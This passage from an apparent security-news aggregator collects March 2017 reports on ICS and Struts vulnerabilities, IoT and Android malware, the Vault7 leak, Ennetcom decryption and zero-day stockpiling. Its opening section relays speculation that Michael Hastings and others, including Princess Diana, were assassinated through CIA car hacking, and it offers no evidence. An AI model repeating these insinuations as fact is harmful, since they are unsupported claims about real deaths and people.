Curiously, according to the San Diego 6 News. Hastings had been investigating CIA Director John Brennan prior to the incident he had also contacted WikiLeaks lawyer Jennifer Robinson just a few hours before he died, confirming that feds investigating his work.
Just coincidences, but some details on the incidents rose the suspicion among the journalists.
“Several details regarding the crash itself also suggested the possibility that Hastings’ death was the result of foul play, despite official statements to the contrary. For instance, the car caused no damage to the median curb dividing the four-lane road where the crash occurred, nor were there any skid marks present – despite the fact that the car made a sudden 60-degree turn into a palm tree.” reported Mintpressnews.com.
There is another strange particular about the incident, a worker at a business located near the site of the crash that assisted the incident told San Diego News 6 that the car was traveling too fast and that he heard explosions from within the vehicle shortly before the deadly impact.
The police confirmed that the fire inside the car was too intense for such kind of incident, the coroner had serious difficulties in analyzing the Hastings’ body.
The car was never analyzed by independent experts, despite public rumors of foul play.
The former U.S. National Coordinator for Security, Infrastructure Protection and Counterterrorism Richard A. Clarke, told the Huffington Post that the crash that killed Hastings was “consistent with a car cyber attack.”
“What has been revealed as a result of some research at universities is that it’s relatively easy to hack your way into the control system of a car, and to do such things as cause acceleration when the driver doesn’t want acceleration, to throw on the brakes when the driver doesn’t want the brakes on, to launch an air bag,” Clarke told The Huffington Post. “You can do some really highly destructive things now, through hacking a car, and it’s not that hard.”
“So if there were a cyber attack on the car — and I’m not saying there was,” Clarke added, “I think whoever did it would probably get away with it.”
“I’m not a conspiracy guy. In fact, I’ve spent most of my life knocking down conspiracy theories,” said Clarke, who ran afoul of the second Bush administration when he criticized the decision to invade Iraq after 9/11. “But my rule has always been you don’t knock down a conspiracy theory until you can prove it [wrong]. And in the case of Michael Hastings, what evidence is available publicly is consistent with a car cyber attack. And the problem with that is you can’t prove it.”
Back to the present, documents shared by Wikileaks contain details about the study of the CIA on the possibility to infect the vehicle control systems used by modern cars and trucks. The malicious code would permit the CIA to engage in nearly undetectable assassinations.
“While the Wikileaks documents confirm that this technology existed in 2014, there is reason to believe that the CIA was capable of hacking vehicles as far back as the late 1990s. Gordon Duff, senior editor of Veterans Today, wrote in 2010 about what he termed the CIA’s “Boston Brakes” assassination technique.” continues the Mintpressnews.
“In the article, Duff noted that the deaths of Chilcot Inquiry witness Richard Waddington, anti-Zionist Austrian politicians Jorg Haider and even Princess Diana all involved car crashes where the vehicle crashed into objects like concrete abutments but left no skid marks – not unlike the Hastings crash.”
According to a story published by WhoWhatWhy in 2013, Michael Hastings was investigating the use of the CIA of weaponized malware and surveillance tools.
Schneider Electric Patches Flaws in ClearSCADA, Wonderware Products
13.3.2017 securityweek ICS
Schneider Electric has released patches to address critical and high severity vulnerabilities in its StruxureWare SCADA Expert ClearSCADA and Wonderware Intelligence products, ICS-CERT informed organizations last week.
According to advisories released by both ICS-CERT and Schneider Electric, the ClearSCADA product is affected by a high severity flaw (CVE-2017-6021) that allows an attacker on the network to crash the ClearSCADA server process and communications driver by sending a specially crafted request.
The security hole, discovered by researchers at Kaspersky Lab, affects all supported versions of the SCADA product, including ClearSCADA 2014 R1 (build 75.5210), 2014 R1.1 (build 75.5387), 2015 R1 (build 76.5648) and 2015 R2 (build 77.5882).
Service packs or hotfixes were released for versions 2014 R1.1 (build 75.6239), 2015 R1.1 (build 76.6191) and 2015 R2 (build 77.6181) in December and January. Users of ClearSCADA 2013 R2 and earlier versions have been advised to update to 2015 R2.
Learn More at the 2017 Singapore ICS Cyber Security Conference
A separate advisory describes a critical severity credentials management issue (CVE-2017-5178) affecting the Tableau Server analytics software optionally available in the Wonderware Intelligence solution.
The Tableau Server software includes a default account that is not easy to configure after installation. ICS-CERT said the process of changing the default credentials for Tableau Server is not documented.
The account in question has administrative privileges, allowing an attacker to leverage it to take control of the host machine, the vendor warned.
Schneider has advised all organizations that use Wonderware Intelligence with Tableau Server versions 7.0 through 10.1.3 to update both the Tableau Server and Tableau Client (Desktop) components to version 10.1.4. It’s worth noting that only installations configured for local authentication are affected by the flaw; installations that use Active Directory are not impacted.
These are not the only vulnerabilities patched by Schneider this year. The company has also addressed security holes in homeLYnk, Wonderware Historian, StruxureWare Data Center Expert, and Conext Combox.
Actively Exploited Struts Flaw Affects Cisco Products
13.3.2017 securityweek Exploit
Cisco informed customers on Friday that at least some of its products are affected by an Apache Struts2 command execution vulnerability that has been exploited in the wild over the past days.
The flaw has been confirmed to affect the Cisco Identity Services Engine (ISE), the Prime Service Catalog Virtual Appliance, and the Unified SIP Proxy Software. The networking giant has published a list of dozens of products that are not affected, but there are still many products under investigation.
While the vulnerability has been actively exploited to deliver malware, Cisco has not found any evidence of attacks targeting its products. Nevertheless, the company has warned users that exploits for this flaw are publicly available. It’s worth noting that Cisco’s Talos group was the first to warn of active attacks.
The security hole, identified as CVE-2017-5638, affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10, and it was addressed on March 6 with the release of versions 2.3.32 and 2.5.10.1. The first attacks were spotted one day later when someone published a proof-of-concept (PoC) exploit.
The vulnerability exists in the Jakarta Multipart parser and is caused by the improper handling of Content-Type header values. A remote, unauthenticated attacker can exploit the weakness to execute arbitrary commands by sending a specially crafted HTTP request.
Researchers observed exploitation attempts whose goal was to determine if a system is vulnerable, and ones where attackers attempted to deliver various types of malware, including IRC bouncers and DoS/DDoS bots.
Rapid7 has been monitoring attacks and, based on data from its honeypots, determined that much of the malicious traffic comes from two machines apparently located in China.
Cisco and other security vendors have started releasing firewall rules that should block such attacks. Tinfoil Security has made available an online tool that allows website owners to check if they are vulnerable to attacks exploiting CVE-2017-5638.
Americký úřad bojuje proti bitcoinům. Nový fond na burzu nesmí
12.3.2017 Novinky/Bezpečnost BigBrother
Americká Komise pro cenné papíry a burzy (SEC) zamítla tento týden žádost o uvedení prvního fondu založeného na kybernetické měně bitcoin na burzu ve Spojených státech. Na to reagovala hodnota bitcoinu strmým pádem.
Hodnota jednoho bitcoinu se v pátek bezprostředně po tomto rozhodnutí propadla o zhruba 18 procent a dostala se až pod hranici 1000 dolarů (zhruba 25 000 Kč). Následně se však nad tuto hranici vrátila, napsala agentura Reuters.
Dvojčata Tyler a Cameron Winklevossovi se snažili komisi přesvědčit, aby umožnila vstup jejich bitcoinového fondu na burzu Bats BZX. Komise se však rozhodla, že takovýto krok nepovolí kvůli nedostatečné regulaci této kybernetické měny.
Bitcoiny se těší velké popularitě především coby prostředek pro investici. Kurzy však často kolísají. Evropský bankovní úřad kvůli tomu dokonce varoval spotřebitele, že neregulované virtuální měny představují velké riziko. Jejich vklady totiž nejsou nijak chráněny.
Poslední bitcoin v roce 2140
Virtuální měna bitcoin vznikla v roce 2009, větší popularitě se ale těší v posledních letech. Vytvořena byla tak, aby se nedala ovlivňovat žádnou vládou ani centrální bankou. Kybernetické mince „razí“ síť počítačů se specializovaným softwarem naprogramovaným tak, aby uvolňoval nové mince stabilním, ale stále klesajícím tempem. Počet mincí v oběhu má dosáhnout nakonec 21 miliónů, což má být kolem roku 2140.
Tyler a Cameron Winklevossovi se v minulosti zviditelnili právním sporem se zakladatelem Facebooku Markem Zuckerbergem, kterého obvinili, že jim ukradl jejich nápad na vytvoření internetové sociální sítě. Dohoda o urovnání této žaloby jim vynesla zhruba 65 miliónů dolarů.
CIA plánovala hackování aut
12.3.2017 Novinky/Bezpečnost BigBrother
Vlámat se do auta umí každý, pokud má třeba cihlu. Sofistikovanější systémy už umí na dálku odemknout auto jako dálkovým ovladačem. Uniklé dokumenty CIA na WikiLeaks ukázaly, že americká špionážní služba plánovala nabourání se do programů aut pro jejich ovládnutí.
Spoustu lidí nenechává chladnými to, že kdokoli se jim může dostat do počítače či mobilu, využívat ho, sledovat, odposlouchávat… Říká se tomu hacknutí. Podle dokumentů zveřejněných na WikiLeaks v této činnosti CIA vyvíjela řadu aktivit. Ukazuje se, že plánovala ovládnout na dálku i auta.
Objevily se totiž složky, kde CIA předpokládá, že ovládnutí systémů vozidel by mohlo mít „potenciál pro oblast misí“. Co to znamená?
Jako hračka na dálkové ovládání
Představte si auto s teroristou, který ujíždí pryč a než by ho policie chytla, už by se ztratil v nepřehledné džungli města. Hackerský útok by ho ale mohl vlastně zatknout. Uzamkl by ho v automobilu a řídil by ho tam, kam by bylo zapotřebí. Třeba k nejbližší policejní hlídce.
Je to přitažené za vlasy? Už v roce 2015 svolal Jeep do servisů 1,5 miliónu vozidel, protože server Wired ukázal, že hackeři (a byli to soukromníci, žádná organizovaná a státem podporovaná skupina) dokážou modelu Cherokee za jízdy nabourat vnitřní systém a převzít nad ním kontrolu.
Dokumenty na WikiLeaks ukazují, že CIA se zaměřila na systém QNX od BlackBerry, který je dnes součástí šedesáti miliónů vozidel po celém světě.
DDoS Malware Targets AVTech CGI Vulnerability
12.3.2017 securityweek Virus
A newly discovered Linux malware family is targeting products from surveillance technology company AVTech via a CGI vulnerability that was disclosed in October 2016, Trend Micro researchers warn.
Detected as ELF_IMEIJ.A, the malware is the latest in a long list of Trojans targeting Linux ARM devices (such as Mirai, Umbreon rootkit, LuaBot, BashLite, and more). Linux has become the platform of choice for many Internet of Things (IoT) devices, and it’s no wonder cybercriminals are focusing on targeting it, as this provides them with a large attack surface.
The newly discovered malware attempts to infect devices from AVTech by exploiting a reported CGI vulnerability residing in CloudSetup.cgi, which is found in all AVTech devices that support the Avtech cloud.
“The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed. Since there is no verification or white list-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges,” Search-Lab explains.
The vulnerability was disclosed to AVTech in October 2016, but the vendor has provided no response, despite repeated attempts to contact it, Trend Micro reveals.
The ELF_IMEIJ.A malware is distributed via RFIs in cgi-bin scripts. A specific request is sent to random IP addresses to discover vulnerable devices, and the Trojan is delivered through a command injection that triggers the download. The targeted device, Trend Micro explains, is tricked into fetching the malicious file and changing the file’s permissions to execute it locally.
“The points of entry for this new Linux malware are connected AVTech devices such as IP cameras, CCTV equipment, and network recorders that support the AVTech cloud. Once the malware is installed onto the device, it gathers system information and network activity data. It can also execute shell commands from the malicious actor, initiate Distributed Denial of Service (DDoS) attacks, and terminate itself,” the researchers explain.
Given its DDoS capabilities, the malware can be compared to Mirai, but the modus operandi clearly sets the threat apart. The new Trojan targets only AVTech products, uses only port 39999, and infects only devices with insecured cgi-bin scripts, which allow for successful malware installation.
“AVTech has over 130,000 different devices connected to the Internet, so this attack may be used to gain and maintain persistent access to these devices. The devices can also be turned into bots and used to drive large scale DDoS attacks. Like most connected devices, the targets are not secured by default and are impossible to directly monitor,” Trend Micro says.
ELF_IMEIJ, a new Linux malware is spreading in the wild
12.3.2017 securityaffairs Virus
Security experts from Trend Micro discovered a new family of Linux malware, tracked as ELF_IMEIJ, targeting AVTech surveillance devices.
Security experts from Trend Micro discovered a new family of Linux malware that is targeting products from surveillance technology company AVTech exploiting a CGI vulnerability that was disclosed in 2016.
According to Trend Micro, the flaw was reported to AVTech in October 2016, but the vendor has never responded.
“The vulnerability was discovered and reported by Search-Lab, a security research facility, and was disclosed to AVTech on October 2016. However, even after repeated attempts by Search-Lab to contact the vendor there was no response.” reads Trend Micro.
The malicious code, tracked as ELF_IMEIJ.A, attempts to infect AVTech by exploiting an authenticated command injection residing in the CloudSetup.cgi, a CGI that is present in all AVTech devices that support the Avtech cloud.
“Devices that support the Avtech cloud contain CloudSetup.cgi, which can be accessed after authentication. The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed.” reads the advisory published by Search-Lab. “Since there is no verification or white list-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges.”
The ELF_IMEIJ malware is spread via RFIs in cgi-bin scripts. The attackers send a specific request to random IP addresses in the attempt of discovering vulnerable devices. The Trojan is delivered through a command injection that triggers the download of the malicious payload.
The targeted device is tricked into fetching the malicious file, changing the file’s permissions and then executing it locally.
“The points of entry for this new Linux malware are connected AVTech devices such as IP cameras, CCTV equipment, and network recorders that support the AVTech cloud. Once the malware is installed onto the device, it gathers system information and network activity data.” continues Trend Micro. “It can also execute shell commands from the malicious actor, initiate Distributed Denial of Service (DDoS) attacks, and terminate itself,”
The researchers explained that the malware is able to execute shell commands from the malicious actors and also initiate Distributed Denial of Service (DDoS) attacks.
The ELF_IMEIJ Trojan only targets AVTech products, it uses the port 39999 in order to infect only devices with unsecured cgi-bin scripts.
Below a table that is used for a comparison of the Mirai malware with ELF_IMEIJ.A.
MIRAI IMEIJ
Affected Devices Various AVTech
Used Ports 7547
5555
48101 39999
Exploits Devices with BusyBox software installed by bruteforce Devices unsecured cgi-bin scripts to install the malware ELF_IMEIJ.A
“AVTech has over 130,000 different devices connected to the Internet, so this attack may be used to gain and maintain persistent access to these devices.” continues the analysis from Trend Micro. “The devices can also be turned into bots and used to drive large scale DDoS attacks. Like most connected devices, the targets are not secured by default and are impossible to directly monitor,”
The discovery of the ELF_IMEIJ.A trojan shows the increasing interest of threat actors in targeting Linux devices.
Check Point experts spotted pre-Installed Android Malware on 38 Android devices
12.3.2017 securityaffairs Android
Experts discovered pre-installed malware on 38 high-end smartphone models belonging to popular manufacturing companies such as Samsung, LG, Xiaomi and Asus.
In the past, security experts have already reported cases of pre-installed malware on mobile devices.
In September 2015, security experts at G-Data security firm discovered new cases of Chinese Android mobile devices infected by pre-installed malware.
In December 2016, experts from Doctor Web spotted new Trojans into the firmware of several dozens of low-cost Android smartphones and tablets.
The malicious code allows attackers to control the infected devices, from downloading, installing and executing Android malicious apps, accessing data and to dialing premium phone numbers.
The news of the day is that experts at security firm CheckPoint discovered at least 38 high-end smartphone models belonging to popular manufacturing companies such as Samsung, LG, Xiaomi, Asus, Nexus, Oppo, and Lenovo, which are being distributed by two unidentified companies have been found with pre-installed malware.
The researchers discovered two distinct families of malware, Loki and SLocker, on the mobile devices distributed by the companies.
According to the experts at CheckPoint, the malicious apps were not included in the official ROM firmware that was supplied by the vendors, but evidently, the supply chain is compromised and the devices are commercialized with pre-installed malware.
“According to the findings, the malware were already present on the devices even before the users received them. The malicious apps were not part of the official ROM supplied by the vendor, and were added somewhere along the supply chain.” reads the blog post published by Check Point researchers.
The experts noticed that in some cases the malicious codes were added by using systems privileged making hard the removal of the apps.
“Six of the malware instances were added by a malicious actor to the device’s ROM using system privileges, meaning they couldn’t be removed by the user and the device had to be re-flashed.” continues the analysis.
The Loki malware implements spyware capabilities, it allows attackers to gain full control on the victims’ devices.
The SLocker is a mobile ransomware that locks victims mobile devices and requests the payment of a ransom to unlock them.
Below the list of infected mobile devices is:
Galaxy Note 2
LG G4
Galaxy S7
Galaxy S4
Galaxy Note 4
Galaxy Note 5
Galaxy Note 8
Xiaomi Mi 4i
Galaxy A5
ZTE x500
Galaxy Note 3
Galaxy Note Edge
Galaxy Tab S2
Galaxy Tab 2
Oppo N3
Vivo X6 plus
Nexus 5
Nexus 5X
Asus Zenfone 2
LenovoS90
OppoR7 plus
Xiaomi Redmi
Lenovo A850
The malware is very difficult to uninstall because the are part on device’s ROM using system privileges.
To remove the malware, users have to options:
Root your device and uninstall the malicious apps.
Flash the firmware/ROM.
Danish-speaking users hit by malware spread via Dropbox links
12.3.2017 securityaffairs Virus
Danish-speaking users were infected by malware spread through Dropbox, but the company quickly adopted the countermeasures to stop the attack.
According to the experts from security firm AppRiver, Danish-speaking users were hit by an unusual malware-based attack.
The attack hit Denmark, Germany, and several surrounding Scandinavian countries on Wednesday morning.
Danish-speaking users were infected by malware spread through Dropbox, but the company quickly adopted the countermeasures to stop the attack.
“Early this morning, Denmark, Germany and several surrounding Scandinavian countries were hit with a large volume malware attack. The attack leveraged the legitimate cloud storage service Dropbox to host their malware payloads while attempting to disguise the links with random strings of characters and varying filenames.” reads the analysis shared by AppRiver. “In the past 12 hours, we have quarantined thousands of these messages, which only represents a small percentage of the total message volume.
”Dropbox spamIt is not clear how threat actors have chosen the potential targets of the attack that I remind you is composed of Danish-speaking users.
The exploitation of Dropbox by crooks is not a novelty, an attacker can use spam messages containing links to cloud storage that points malicious files, they leverage on the fact that usually there are no restrictions on the Dropbox traffic.
The researchers noticed that the attackers used a unique link for each malicious message on the hacking campaign, this circumstance suggests the attackers used an automated script to randomly create the Dropbox file shares.
The researchers discovered that the attackers sent out messages claiming to provide shipping details and a fake invoice. The links included in the messages point to a .zip archive that contained a JavaScript file which contained a Trojan dropper.
“Lately we have seen more email providers tighten restrictions on what type of files can be sent/received as an attachment. In response, malware distributors, whom are always looking for a weakness to exploit, have embraced file sharing as an alternative means to distribute those malicious files. We expect this trend to continue throughout the year.” continues the analysis.
Troy Gill, security analyst at AppRiver, explained that Dropbox quickly replied to the attack, after two hours almost all the malicious links were disabled.
“I would say that after about an hour, we saw a lot of the links disabled,” he said. “After two hours, I was hard press to find a link that wasn’t disabled.”
Crooks sent out hundreds of thousands, maybe millions of messages.
How to protect companies from such kind of attacks?
Businesses can use spam filters, but a more aggressive approach implies the ban of emails embedding Dropbox links.
“If you wanted to be aggressive, you could ban inbound Dropbox content links,” he said. “And if you decided that your organization wasn’t going to use it, you could easily make a change to your spam filter or your web filter to block access to Dropbox entirely.”
Beware! Pre-Installed Android Malware Found On 36 High-end Smartphones
11.3.2017 thehackernews Android
Bought a brand new Android Smartphone? Do not expect it to be a clean slate.
At least 36 high-end smartphone models belonging to popular manufacturing companies such as Samsung, LG, Xiaomi, Asus, Nexus, Oppo, and Lenovo, which are being distributed by two unidentified companies have been found pre-loaded with malware programs.
These malware infected devices were identified after a Check Point malware scan was performed on Android devices. Two malware families were detected on the infected devices: Loki and SLocker.
According to a blog post published Friday by Check Point researchers, these malicious software apps were not part of the official ROM firmware supplied by the smartphone manufacturers but were installed later somewhere along the supply chain, before the handsets arrived at the two companies from the manufacturer's factory.
First seen in February 2016, Loki Trojan inject devices right inside core Android operating system processes to gain powerful root privileges. The trojan also includes spyware-like features, such as grabbing the list of current applications, browser history, contact list, call history, and location data.
On the other hand, SLocker is a mobile ransomware that locks victims devices for ransom and communicates through Tor in order to hide the identity of its operators.
List of Popular Smartphones Infected with Malware
Here's the list of infected smartphones:
Galaxy Note 2
LG G4
Galaxy S7
Galaxy S4
Galaxy Note 4
Galaxy Note 5
Galaxy Note 8
Xiaomi Mi 4i
Galaxy A5
ZTE x500
Galaxy Note 3
Galaxy Note Edge
Galaxy Tab S2
Galaxy Tab 2
Oppo N3
Vivo X6 plus
Nexus 5
Nexus 5X
Asus Zenfone 2
LenovoS90
OppoR7 plus
Xiaomi Redmi
Lenovo A850
The malware backdoor offers its operator unrestricted access to these infected devices, from downloading, installing and activating Android malicious apps, deleting user data, uninstalling security software and disabling system apps, to dialing premium phone numbers.
This incident underscores the dangers of untrusted supply chains, and experts are quite worried about the security of the supply chain with reports of over 20 incidents where rogue retailers have managed to pre-install malware on new Android handsets.
Here's How to Remove the Malware Infections:
Since the malware programs were installed to the device's ROM using system privileges, it's hard to get rid of the infections.
To remove the malware from the infected devices, either you can root your device and uninstall the malware apps easily, or you would need to completely reinstall the phone firmware/ROM via a process called "Flashing."
Flashing is a complex process, and it is recommended that users power off their device and approach a certified technician/mobile service provider.
It's not the first time when high-end smartphones have been shipped pre-installed with malicious apps that can covertly siphon sensitive user data.
In December last year, certain low-cost Android smartphones and tablets were found to be shipped with malicious firmware that covertly gathered data about the infected devices, displays ads on top of running apps and downloads unwanted APKs on the victim's devices.
In November, researchers discovered a hidden backdoor in the AdUps firmware of over 700 Million Android smartphones, which also covertly gathered data on phone owners and sent it to a Chinese server without the user's knowledge.
Meanwhile, a flaw in the Ragentek firmware used by certain low-cost Android devices was also discovered that allowed attackers to remotely execute malicious code with root privileges, turning over full control of the devices to hackers
WikiLeaks is working with software makers on Zero-Days included in the Vault7 dump
11.3.2017 securityaffairs BigBrothers
WikiLeaks announced is working with software makers on Zero-Days by sharing information on the hacking tools included in the Vault7 dump with them.
WikiLeaks announced on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA)
The Wikileaks dump, called “Vault7,” exposed the hacking capabilities of the US Intelligence Agency and its internal infrastructure.
“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.” reads the announcement issued by WikiLeaks by Wikileaks.
According to Wikileaks, the precious archive appears to have been circulated among former US government experts and contractors in an unauthorized manner. One of them likely provided the files to WikiLeaks.
The archive includes confidential information, malicious codes, and exploits specifically designed to target popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.
The hacking tools developed by the US cyber spies can target mobile devices, desktop computers, and IoT devices such as routers and smart TVs.
Now WikiLeaks has decided to share information on the hacking tools included in the Vault7 dump with the tech companies whose products are affected. but the White House has warned that there may be legal repercussions.
The White House promptly warned that there may be legal repercussions for the organization.
The intent of Wikileaks is to protect the customers of the major companies that use the products of several major companies that are impacted by the hacking tools in the data leak.
Follow
WikiLeaks ✔ @wikileaks
Tech companies are saying they need more details of CIA attack techniques to fix them faster. Should WikiLeaks work directly with them?
6:53 PM - 8 Mar 2017
Yes, make people safe
No, they're the problem
Other (see my reply)
Vote
52,388 votes • 4 hours left
1,941 1,941 Retweets 1,846 1,846 likes
WikiLeaks initially announced it would not release any tools or exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons‘ should analyze, disarmed and published.”
wikileaks cia data leak
During a WikiLeaks press conference on March 9, 2017, Julian Assange explained that the organization decided to share information with impacted companies.
“We have decided to work with them, to give them some exclusive access to the additional technical details we have so that fixes can be developed and pushed out so that people can be secured,” Assange said. “And then, once this material is effectively disarmed by us, by removing critical components, we will publish additional details about what has been occurring.”
The decision was taken by WikiLeaks and its followers through a poll on Twitter about the possibility to share technical details of the hacking tools with the companies in private industry that sell the products targeted by the US intelligence.
“Yes, make people safe,” while 36 percent of respondents said “No, they’re the problem.”
“If a program or a piece of information is classified, it remains classified regardless of whether or not it is released into the public venue or not,” said White House press secretary Sean Spicer. “I would just suggest that someone consult with [the Department of Justice] regarding the legal repercussions of any individual or entity using any piece of still-classified information or technique or product that hasn’t been declassified.”
The CIA has refused to comment the authenticity of Wikileaks data leak and remarked that US law doesn’t allow the Government to spy on it citizens.
While I was writing, tech companies are already working to fix the zero-day flaws in their products and to offer customers tools to detects the presence of anomalies in their applications.
Intel Security has released a tool that allows users to check if the firmware of computers contains unauthorized code.
The Advanced Threat Research team at Intel Security developed a new module for its existing CHIPSEC open-source framework to detect rogue EFI binaries. It can be used to detect malicious code from Windows, Linux, macOS, and even from an EFI shell.
Ennetcom – Dutch Police confirmed to have decrypted BlackBerry PGP messages in a criminal case
11.3.2017 securityaffairs Mobil
The Dutch police decrypted a number of PGP messages sent by crooks through their BlackBerry mobile devices for the criminal investigation on Ennetcom.
PGP is an open source end-to-end encryption standard that can be used to sign emails, files, documents, or disk partitions.
On April 2016, the Dutch Police arrested a 36-year-old man on suspicion of money laundering who was also accused of selling PGP ready-to-use BlackBerry Phones to criminals.
In April, I reported the news of the seizure of the Ennetcom servers, the company owned by Danny Manupassa, which contains data related communications belong to a large number of criminal groups.
““Police and prosecutors believe that they have captured the largest encrypted network used by organized crime in the Netherlands,” said the prosecutors in an official statement published at the time of the arrest.
The police arrested Mr. Manupassa, the prosecutors suspect he was using his company to manage illegal activities.
Investigations appeared very complicated due to territorial competences, the majority of Ennetcom customers were in the Netherlands, but the company’s servers were in Canada. Prosecutors obtained copies of data on the servers located in Canada with the support of the Toronto police.
Canadian authorities cooperated with the Dutch colleagues, allowing the access to the company servers and the information extracted have been used in the investigation against Manupassa.
“The company sold modified telephones for about 1,500 euros each and used its own servers for the encrypted data traffic,” the prosecutors said. “The phones had been modified so that they could not be used to make calls or use the Internet.”
In January 2016, the Dutch investigators announced they could decrypt emails stored on PGP-encrypted BlackBerry devices by using commercially available tools. The authorities are only able to access conversations made by phones in their possession of the authorities.
The Dutch police confirmed its agents have decrypted the contents of 3.6 Million messages stored on that seized server.
The Public Prosecution Service, Openbaar Ministerie, confirmed in a press release that the police decrypted a number of messages even when protected with end-to-end encryption.
“The Dutch police and the Public Prosecution Service (OM) had access to 3.6 million encrypted messages within organized crime.” reads the press release “By decrypting the information is evidence became available for dozens of criminal investigations into assassinations, armed robbery, drug trafficking, money laundering, attempted murder and other organized crime. “
According to the authorities, Ennetcom sold more than 20,000 encrypted BlackBerry phones that came preloaded with a number of security features, including PGP email.
The Dutch authorities discovered that the Ennetcom PGP BlackBerry devices routed customers communications through a BlackBerry Enterprise Server operated by the company.
“PGP BlackBerry devices are specifically designed to send and receive PGP email messages with other PGP BlackBerry devices. It is recognized that, by their nature, PGP encrypted devices can be used to frustrate the usual methods by which police, and other investigative bodies, intercept communications and identify the communicators. The Dutch authorities say that Ennetcom PGP BlackBerry devices, that they have found in the course of their investigations, have been modified so that they can only send and receive encrypted email. Unusually, these Ennetcom PGP BlackBerry devices cannot send or receive phone calls or conventional text messages, nor can they take pictures. The microphones on the phones have either been removed or disabled. It is also possible for Ennetcom to remotely “wipe” or erase the contents of any of their devices at any time.” a Canadian court filing reads.
“The Dutch authorities also discovered that these Ennetcom PGP BlackBerry devices, because of their modifications, could not be used on conventional cellular telephone networks. Rather, they operate through a system run by Ennetcom that generates anonymous email addresses by which the users of these devices can communicate in complete anonymity. The Ennetcom PGP BlackBerry devices can only operate through a BlackBerry Enterprise Server. BlackBerry Enterprise Server is a software package that permits IT administrators, within an organization, to control virtually all functions of BlackBerry devices connected to the organization’s network. It allows those administrators to make the devices a secure as the organization would like. In this case, the Dutch authorities discovered that the Ennetcom PGP BlackBerry devices were only able to communicate via PGP encrypted e-mail with other Ennetcom PGP BlackBerry devices connected to the same Ennetcom network. The Dutch authorities also discovered that the “keys” for the PGP encryption system were generated by the server, rather than by the device. As a result, the Dutch authorities came to believe that the keys to decrypt the PGP encrypted information, on the Ennetcom PGP BlackBerry devices, are stored on Ennetcom’s BlackBerry Enterprise Servers.”
Summarizing, Ennetcom was using its own BlackBerry Enterprise Servers and the PGP encryption keys were generated by the company itself rather by the customers’devices. The Ennetcom was storing the keys on its BlackBerry Enterprise Servers and the police discovered it.
The police have found a total of 7TB of data on the Ennetcom central server in Canada and have discovered the way to access encrypted messages.
Ennetcom in response to the Dutch authorities published a press release that contests the seizures that according to the company were done under false pretenses.
Zero-day Conundrum: Keep or Disclose Vulnerability Stockpiles?
11.3.2017 securityweek Vulnerebility
Zero-Day Stockpiles
Business Should Move to an Incident Response Security Posture and Accept that Governments Will Maintain Stockpiles of Zero-days
With surprising concurrency, the RAND Corporation has published a lengthy study into zero-day exploits stockpiled by government just two days after WikiLeaks released its batch of documents on CIA hacking tools. While many have been surprised and even appalled that the government should maintain a stockpile of zero-day vulnerabilities and exploits, RAND seems to accept it as a matter of fact that all governments do so.
For the purpose of its research, "RAND obtained rare access to a dataset of information about zero-day software vulnerabilities and exploits." This dataset spans 14 years from 2002 to 2016, and contains information on more than 200 exploits and their vulnerabilities. More than half of these were still zero-days on March 1, 2017.
RAND describes itself as "a research organization that develops solutions to public policy challenges to help make communities throughout the world safer and more secure, healthier and more prosperous." In this study, it analyzes the life-span of a zero-day exploit with the intention of helping government policy on whether to stockpile or disclose.
"There is an ongoing policy debate," says the report (PDF), "of whether the U.S. government -- or any government -- should retain so-called zero-day software vulnerabilities or disclose them so they can be patched." The implication is that RAND's statistical analysis of the lifespan of the zero-day exploit will help government to decide whether to keep or disclose, because "many worry that keeping these vulnerabilities secret can expose people who use the vulnerable software to malware attacks and other attempts to collect their private information."
This is not a major concern of the study. The research is not about when government should disclose to keep the user safe, but when government should disclose because adversary governments also know about the vulnerability.
Responsible Vulnerability Disclosure
"If both sides have the same stockpiles, then some argue that there is little point to keeping them private -- whereas a smaller overlap might justify retention. But without information on the overlap, or concrete metrics based on actual data, it is challenging to make a well-informed decision about stockpiling," the report reads.
These challenges are also problematic for RAND's research. A zero-day exploit is zero-day until it is patched by the vendor. But there is no limit to the number of actors who could be in possession of the exploit -- it remains zero-day until it is patched. This means that a government, many adversary governments, and any number of criminal actors may be in possession of the same vulnerability knowledge and it still remain zero-day.
RAND acknowledges that refusal to disclose a vulnerability could be problematic for the user if it is also known to bad actors. It claims that its research "shows that that the collision rates for zero-day vulnerabilities are nonzero." By this it simply means that not all zero-days in its sample were known only to its supplier. Most people will assume that the supplier is the US government; but it makes no difference to the argument.
"Some may argue that, if there is any probability that someone else (especially an adversary) will find the same zero-day vulnerability, then the potentially severe consequences of keeping the zero-day private and leaving a population vulnerable warrant immediate vulnerability disclosure and patch. In this line of thought, the best decision may be to stockpile only if one is confident that no one else will find the zero-day; disclose otherwise."
The difficulty here is the impossibility of knowing absolutely whether an adversary or criminal bad actor has that vulnerability until or unless it is used and discovered; by which time disclosure will be too late to benefit the victim. The implication is that governments knowingly accept that in stockpiling vulnerabilities there may be collateral damage among the user population that could have been prevented had the vulnerabilities been disclosed rather than kept.
"RAND talks about stockpiling 'either for defensive purposes (e.g., penetration testing) or offensive operations'," comments ESET senior research fellow David Harley. "Noticeably absent from that sentence is any suggestion of disclosure for the benefit of potential victims... Leaving aside the issue of internal testing, which in times of economic stringency is probably honored more in the breach than the observance, I'd guess that the main potential conflict is between direct danger to the IT-using population as a whole, and disclosure as a perceived threat to national security (for instance, by endangering the effectiveness of a planned or ongoing offensive operation). Complicated, perhaps, by factors such as the urgency of the issue, the number and grouping of people potentially affected, and so on."
This question of national security versus public benefit was also noticed by Eric O’Neill, national security strategist at Carbon Black; but he suggests the onus is on government to be able to make a reasonable judgment. "The key thing to consider here is that software vulnerabilities are weapons and should be treated as such," he explained. "When issues of national security are concerned, governments should be protecting these weapons and preventing them from getting in the wrong hands at all costs. When national security is not involved, the government should conduct a transparent dialogue with concerned parties to ensure that these weapons are known about, patches are created and then widely deployed."
The point, he added, is that government cannot excuse itself from all liability to business. "If there is a high probability that zero-days will get into the wrong hands, and these zero-days do not directly conflict with national security interests, the government should act responsibly and disclose appropriately on an agreeable timeline," he added.
